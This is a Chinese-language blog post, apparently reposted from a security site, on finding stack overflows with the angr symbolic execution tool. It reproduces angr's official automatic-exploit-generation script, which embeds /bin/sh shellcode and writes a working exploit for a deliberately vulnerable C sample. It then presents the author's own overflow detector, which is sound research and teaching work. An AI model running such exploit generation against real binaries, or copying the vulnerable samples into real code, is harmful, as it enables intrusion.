初探利用angr进行漏洞挖掘(上)
2020-03-02 09:49:41 Author: xz.aliyun.com(查看原文) 阅读量:407 收藏

angr是一个基于python开发的一款符号执行工具,可以用于二进制分析,在CTF逆向中有很大的用途,例如可以通过约束求解找到复杂计算的正确解,从而拿到flag;然而angr的用途远不止于此,它甚至还能被用于AEG (Automatic Exploit Generation) ,有一个叫zeratool的工具实现了一些用于简单的pwn的AEG,AEG的步骤一般分为:

  • 挖掘漏洞
  • 生成利用exp
  • 验证exp

zeratool采用的挖掘漏洞的方法是通过符号执行,遍历所有可能存在的约束路径,如果出现了 unconstrained 状态的路径,则认为产生了漏洞,本人在查看zeratool源码和动手实践的过程中发现这种挖掘方法不尽全面,只适用于一些单一漏洞的例子,再加上zeratool采用的angr版本为7.x,而最新的已经是8.x,8.x的api也发生了很大改变

因此想探究在angr 8.x上实现进一步的栈溢出漏洞探索和堆空间中UAF和Double_Free漏洞探索,本篇主要是分享一些对挖掘栈溢出漏洞的想法和心得,堆漏洞的在下篇,水平有限,大佬轻喷Orz

先举一个官方的AEG的简单例子(在angr根目录的examples/insomnihack_aeg中)

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char component_name[128] = {0};

typedef struct component 
{
    char name[32];
    int (*do_something)(int arg);
} comp_t;

int sample_func(int x) 
{
    printf(" - %s - recieved argument %d\n", component_name, x);
}

comp_t *initialize_component(char *cmp_name) {
    int i = 0;
    comp_t *cmp;

    cmp = malloc(sizeof(struct component));
    cmp->do_something = sample_func;

    printf("Copying component name...\n"); 
    while (*cmp_name)
        cmp->name[i++] = *cmp_name++;

    cmp->name[i] = '\0';
    return cmp;
}

int main(void)
{
    comp_t *cmp;

    printf("Component Name:\n");
    read(0, component_name, sizeof component_name);

    printf("Initializing component...\n");
    cmp = initialize_component(component_name);    

    printf("Running component...\n");
    cmp->do_something(1);
}

这里很明显可以看到有一个堆溢出漏洞,当component_name长度大于32时,会溢出覆盖到cmp->do_something成员,在之后的cmp->do_something(1)中,会导致程序崩溃

而官方给出的angr脚本如下

import os
import sys
import angr
import subprocess
import logging

from angr import sim_options as so

l = logging.getLogger("insomnihack.simple_aeg")


# shellcraft i386.linux.sh
shellcode = bytes.fromhex("6a68682f2f2f73682f62696e89e331c96a0b5899cd80")

def fully_symbolic(state, variable):
    '''
    check if a symbolic variable is completely symbolic
    '''

    for i in range(state.arch.bits):
        if not state.solver.symbolic(variable[i]):
            return False

    return True

def check_continuity(address, addresses, length):
    '''
    dumb way of checking if the region at 'address' contains 'length' amount of controlled
    memory.
    '''

    for i in range(length):
        if not address + i in addresses:
            return False

    return True

def find_symbolic_buffer(state, length):
    '''
    dumb implementation of find_symbolic_buffer, looks for a buffer in memory under the user's
    control
    '''

    # get all the symbolic bytes from stdin
    stdin = state.posix.stdin

    sym_addrs = [ ]
    for _, symbol in state.solver.get_variables('file', stdin.ident):
        sym_addrs.extend(state.memory.addrs_for_name(next(iter(symbol.variables))))

    for addr in sym_addrs:
        if check_continuity(addr, sym_addrs, length):
            yield addr

def main(binary):
    p = angr.Project(binary)

    binary_name = os.path.basename(binary)

    extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY}
    es = p.factory.entry_state(add_options=extras)
    sm = p.factory.simulation_manager(es, save_unconstrained=True)

    # find a bug giving us control of PC
    l.info("looking for vulnerability in '%s'", binary_name)
    exploitable_state = None
    while exploitable_state is None:
        print(sm)
        sm.step()
        if len(sm.unconstrained) > 0:
            l.info("found some unconstrained states, checking exploitability")
            for u in sm.unconstrained:
                if fully_symbolic(u, u.regs.pc):
                    exploitable_state = u
                    break

            # no exploitable state found, drop them
            sm.drop(stash='unconstrained')

    l.info("found a state which looks exploitable")
    ep = exploitable_state

    assert ep.solver.symbolic(ep.regs.pc), "PC must be symbolic at this point"

    l.info("attempting to create exploit based off state")

    # keep checking if buffers can hold our shellcode
    for buf_addr in find_symbolic_buffer(ep, len(shellcode)):
        l.info("found symbolic buffer at %#x", buf_addr)
        memory = ep.memory.load(buf_addr, len(shellcode))
        sc_bvv = ep.solver.BVV(shellcode)

        # check satisfiability of placing shellcode into the address
        if ep.satisfiable(extra_constraints=(memory == sc_bvv,ep.regs.pc == buf_addr)):
            l.info("found buffer for shellcode, completing exploit")
            ep.add_constraints(memory == sc_bvv)
            l.info("pointing pc towards shellcode buffer")
            ep.add_constraints(ep.regs.pc == buf_addr)
            break
        else:
            l.warning("couldn't find a symbolic buffer for our shellcode! exiting...")
            return 1
    print(ep.posix.dumps(0))
    filename = '%s-exploit' % binary_name
    with open(filename, 'wb') as f:
        f.write(ep.posix.dumps(0))

    print("%s exploit in %s" % (binary_name, filename))
    print("run with `(cat %s; cat -) | %s`" % (filename, binary))
    return 0

def test():
    main('./demo_bin')
    assert subprocess.check_output('(cat ./demo_bin-exploit; echo echo BUMO) | ./demo_bin', shell=True) == b'BUMO\n'

if __name__ == '__main__':
    # silence some annoying logs
    logging.getLogger("angr").setLevel("CRITICAL")
    l.setLevel("INFO")

    if len(sys.argv) > 1:
        sys.exit(main(sys.argv[1]))
    else:
        print("%s: <binary>" % sys.argv[0])

简单来说,这个脚本首先通过符号执行,找出unconstrained状态的路径,然后对这个路径进行约束条件限制,查看是否存在满足以下条件的正解:1.有足够的空间放置shellcode,2.rip能指向shellcode,如果满足了条件,说明这个程序可pwn,那么就把满足这些约束的解所在的路径的标准输入记录下来,作为攻击使用的payload

我们可以发现,在漏洞查找这一步,它直接使用了一种简单粗暴的方法,那就是找unconstrained状态的路径,而这种状态的路径一般来说就是rip值不可约束才会产生的,所谓不可约束,意思就是rip不受控制了,或者说它的值符号化了,例如一般发生栈溢出时,rip的值通常是标准输入的某段字符串,而在angr中,stdin也会被符号化,所以说当rip值变成stdin的部分值时,也就使得rip的值也是符号化的,这样就出现了unconstrained状态。

在我实践的过程中发现,这种挖掘漏洞的方法不够全面,举个例子:

#include <stdio.h>

void func()
{
    char pwd[0x10]={0}; 
    puts("input admin password:");
    read(0,pwd,0x20);
}
void over()
{
    puts("over!");
    char c[0x10]={0};   
    read(0,c,0x20);
}
int main(int argc, char const *argv[])
{
    char name[0x10]={0};
    puts("input your name:");
    read(0,name,0x10);
    over();
    if (strstr(name,"admin"))
    {
        func();
        puts("welcome admin~");
    }
    else
    {
        printf("welcome, %s\n", name);
    }
    return 0;
}
//gcc stack1.c -o stack1 -fno-stack-protector
//关闭canary保护

可以看到该源码中有两个栈溢出漏洞,分别是read(0,c,0x20);read(0,pwd,0x20);

按照前面的例子,通过unconstrained状态来搜索漏洞,写出angr脚本如下:

import angr

p = angr.Project("./stack1")
es = p.factory.entry_state()
sm = p.factory.simulation_manager(es, save_unconstrained=True)

while sm.active:
    sm.step()
if sm.unconstrained:
    for un in sm.unconstrained:
        print("stdout:\n",un.posix.dumps(1))
        print("stdin:\n",un.posix.dumps(0),"\n")

而跑出的结果如下

可以发现,仅通过unconstrained查找出的漏洞,只有over函数里面的那个栈溢出

是什么原因导致了这样的结果?

angr的符号执行会遍历去执行每一个路径,在没有出现if之类的分支语句的时候,路径是只有一条的,也就是说随着符号执行的进行,路径才会慢慢变多,而在该例子中,调用over函数时还属于第一条路径,而over函数中发生溢出时产生了unconstrained的状态,于是就此直接退出该路径的后续探索,从而导致没到if (strstr(name,"admin"))路径探索就已经结束了,因此第二个栈溢出漏洞也就难以找出

在讲我的挖掘思路之前,需要先回顾一下导致栈溢出的一系列过程:

  1. 栈空间被覆盖

  2. 覆盖到栈中rbp值(不考虑canary)

  3. 覆盖到栈中返回地址值

  4. 函数结束,开始返回

  5. leave(pop rbp ;mov rsp rbp),恢复之前rbp,将之前rbp值赋予rsp

  6. ret(pop rip),发生crash

在上面的例子中,执行到over函数时就结束了后续路径的探索,是因为栈溢出使得rip的值unconstrained了

那么如何才能既可以发现over函数中的栈溢出,又能让over函数正确返回,从而继续探索出后续路径中的栈溢出呢?

根据上述6个过程,我的思路就出来了,就是每次进入一个新的函数时,先存储rbp正确的值,等到函数快结束时,先不着急返回,先去判断栈中的数据是否异常,就看即将被pop的rbp位置的值是否符号化,看将被pop rip位置的值是否符号化,如果是,那么很明显出现了栈溢出,然后使用angr去还原正确的栈数据,也就是还原rbp和返回地址,这样一来,既检测出了漏洞同时使得产生漏洞的函数能够继续执行下去,从而达到了探索多个漏洞的目的

以上是总体的思路,但实际上还有许多的小问题需要解决

比如

如何判断进入了一个新的函数和即将离开这个函数呢?

这里我使用的方法是,可以通过判断汇编指令,比如进入函数时,如果出现了push rbp; mov rsp,rbp;这样的指令,那么基本上可以判断是函数的开头,如果出现了leave; ret;,同样可以判断是函数的结尾

代码的具体实现如下:

def check_head(state):
    insns=state.project.factory.block(state.addr).capstone.insns
    if len(insns)>=2:
        #check for : push rbp; mov rsp,rbp; 
        ins0=insns[0].insn
        ins1=insns[1].insn
        if len(ins0.operands)==1 and len(ins1.operands)==2:
            # print(insns)
            ins0_name=ins0.mnemonic#push 
            ins0_op0=ins0.reg_name(ins0.operands[0].reg)#rbp
            ins1_name=ins1.mnemonic#mov 
            ins1_op0=ins1.reg_name(ins1.operands[0].reg)#rsp
            ins1_op1=ins1.reg_name(ins1.operands[1].reg)#rbp

            if ins0_name=="push" and ins0_op0=="rbp" and ins1_name=="mov" and ins1_op0=="rbp" and ins1_op1=="rsp":
                # print("find a function head,save the rsp,rbp")
                pre_target=state.callstack.ret_addr
                state.globals['rbp_list'][hex(pre_target)]=state.regs.rbp

def check_end(state):
    if state.addr==0:
        return
    insns=state.project.factory.block(state.addr).capstone.insns
    if len(insns)>=2:
        flag=0
        #check for : leave; ret;
        for ins in insns:
            if ins.insn.mnemonic=="leave":
                flag+=1
            if ins.insn.mnemonic=="ret":
                flag+=1
        if flag==2:
            ........

当函数调用多的时候,如何存储正确的rbp值?

每次进入新函数时,可以使用字典的方式进行存储rbp,key为该函数结束时的正确返回地址,value为当前函数的rbp,这样一来不论函数调用多复杂,都可以通过唯一的返回地址锁定rbp的正确值

当符号执行路径多的时候,如何保证不同路径之间存储的rbp值是相互独立且不受干扰?

angr中提供了一种这样的用法:state.globals['rbp_list']={}

这个意思是,设置路径state的一个全局变量名为rbp_list,且初始化rbp_list为一个空的字典

这种设置全局变量的方法,只会在被设置的路径以及其衍生路径中存在

比如

int main()
{
    .....
    if(xxx)
    {
    //路径1,不存在name变量
    }
    else if(xxx)
    {
        ////路径2
        设置state.globals['name']=23R3F
        if(xxx)
        {
            //路径2.1,存在name变量
        }
        else
        {
            设置state.globals['age']=233
            //路径2.2,存在name、age变量
        }
    }
    else if(xxx)
    {
        //路径3,不存在name变量
    }
    else
    {
        //路径4,不存在name变量
    }

}

因此通过这种方法设置的路径全局变量rbp_list字典可以保证不被其他不相干路径所干扰

有的时候溢出不一定导致rip修改,可能只溢出到rbp的几个字节,这种情况又该如何挖掘搜索出来?

这里用了angr提供的一种方法,可以检测某地址的值是否符号化,通过这种方法,就能计算出溢出的具体字节,至于溢出到rbp和返回地址,这里可以通过检测顺序来解决,比如溢出到了返回地址,那么必然是溢出了rbp,那么就直接报出pc overflow,因此首先检测返回地址是否被溢出,然后再检测是否溢出到了rbp,如果只溢出到rbp则只报出 rbp overflow

相关代码如下

def check_symbolic_bits(state,val):
    bits = 0
    for idx in range(state.arch.bits):
        if val[idx].symbolic:
            bits += 1
    return bits

def check_end(state):
    ..........
    ..........
            rsp=state.regs.rsp
            rbp=state.regs.rbp
            byte_s=state.arch.bytes
            stack_rbp=state.memory.load(rbp,endness=angr.archinfo.Endness.LE)
            stack_ret=state.memory.load(rbp+byte_s,endness=angr.archinfo.Endness.LE)
            pre_target=state.callstack.ret_addr
            pre_rbp=state.globals['rbp_list'][hex(pre_target)]

            if stack_ret.symbolic:
                num=check_symbolic_bits(state,stack_ret)
                print_pc_overflow_msg(state,num//byte_s)
                state.memory.store(rbp,pre_rbp,endness=angr.archinfo.Endness.LE)
                state.memory.store(rbp+byte_s, state.solver.BVV(pre_target, 64),endness=angr.archinfo.Endness.LE)
                return

            if stack_rbp.symbolic:
                num=check_symbolic_bits(state,stack_rbp)
                print_bp_overflow_msg(state,num//byte_s)
                state.memory.store(rbp,pre_rbp,endness=angr.archinfo.Endness.LE)

以下是完整的代码

import angr

def check_symbolic_bits(state,val):
    bits = 0
    for idx in range(state.arch.bits):
        if val[idx].symbolic:
            bits += 1
    return bits

def print_pc_overflow_msg(state,byte_s):
    print("\n[========find a pc overflow========]")
    print("over for ",hex(byte_s),"bytes")
    print("[PC]stdout:\n",state.posix.dumps(1))
    print("[PC]trigger overflow input:")
    print(state.posix.dumps(0))

def print_bp_overflow_msg(state,byte_s):
    print("\n[========find a bp overflow========]")
    print("over for ",hex(byte_s),"bytes")
    print("[PC]stdout:\n",state.posix.dumps(1))
    print("[PC]trigger overflow input:")
    print(state.posix.dumps(0))


def check_end(state):
    if state.addr==0:
        return
    insns=state.project.factory.block(state.addr).capstone.insns
    if len(insns)>=2:
        flag=0
        #check for : leave; ret;
        for ins in insns:
            if ins.insn.mnemonic=="leave":
                flag+=1
            if ins.insn.mnemonic=="ret":
                flag+=1

        # ins0=insns[0].insn
        # ins1=insns[1].insn
        # if ins0.mnemonic=="leave" and ins1.mnemonic=="ret":
        if flag==2:
            rsp=state.regs.rsp
            rbp=state.regs.rbp
            byte_s=state.arch.bytes
            stack_rbp=state.memory.load(rbp,endness=angr.archinfo.Endness.LE)
            stack_ret=state.memory.load(rbp+byte_s,endness=angr.archinfo.Endness.LE)
            pre_target=state.callstack.ret_addr
            pre_rbp=state.globals['rbp_list'][hex(pre_target)]

            if stack_ret.symbolic:
                num=check_symbolic_bits(state,stack_ret)
                print_pc_overflow_msg(state,num//byte_s)
                state.memory.store(rbp,pre_rbp,endness=angr.archinfo.Endness.LE)
                state.memory.store(rbp+byte_s, state.solver.BVV(pre_target, 64),endness=angr.archinfo.Endness.LE)
                return

            if stack_rbp.symbolic:
                num=check_symbolic_bits(state,stack_rbp)
                print_bp_overflow_msg(state,num//byte_s)
                state.memory.store(rbp,pre_rbp,endness=angr.archinfo.Endness.LE)

def check_head(state):
    insns=state.project.factory.block(state.addr).capstone.insns
    if len(insns)>=2:
        #check for : push rbp; mov rsp,rbp; 
        ins0=insns[0].insn
        ins1=insns[1].insn
        if len(ins0.operands)==1 and len(ins1.operands)==2:
            # print(insns)
            ins0_name=ins0.mnemonic#push 
            ins0_op0=ins0.reg_name(ins0.operands[0].reg)#rbp
            ins1_name=ins1.mnemonic#mov 
            ins1_op0=ins1.reg_name(ins1.operands[0].reg)#rsp
            ins1_op1=ins1.reg_name(ins1.operands[1].reg)#rbp

            if ins0_name=="push" and ins0_op0=="rbp" and ins1_name=="mov" and ins1_op0=="rbp" and ins1_op1=="rsp":
                # print("find a function head,save the rsp,rbp")
                pre_target=state.callstack.ret_addr
                state.globals['rbp_list'][hex(pre_target)]=state.regs.rbp


if __name__ == '__main__':  
    filename="stack1"
    p = angr.Project(filename,auto_load_libs=False)
    state=p.factory.entry_state()
    state.globals['rbp_list']={}
    simgr = p.factory.simulation_manager(state,save_unconstrained=True)

    while simgr.active:
        for act in simgr.active:
            # print("||||||||||||||active head||||||||||||")
            check_head(act)
            check_end(act)
            # print("||||||||||||||active end|||||||||||||")
        simgr.step()
        # print("now->",simgr,"\n")

运行后,可以发现,完美的搜索到了两个栈溢出漏洞:

以上便是我关于栈溢出方面的一点点挖掘思路,如果有师傅有更骚的操作,也望不啬赐教


文章来源: http://xz.aliyun.com/t/7274
如有侵权请联系:admin#unsafe.sh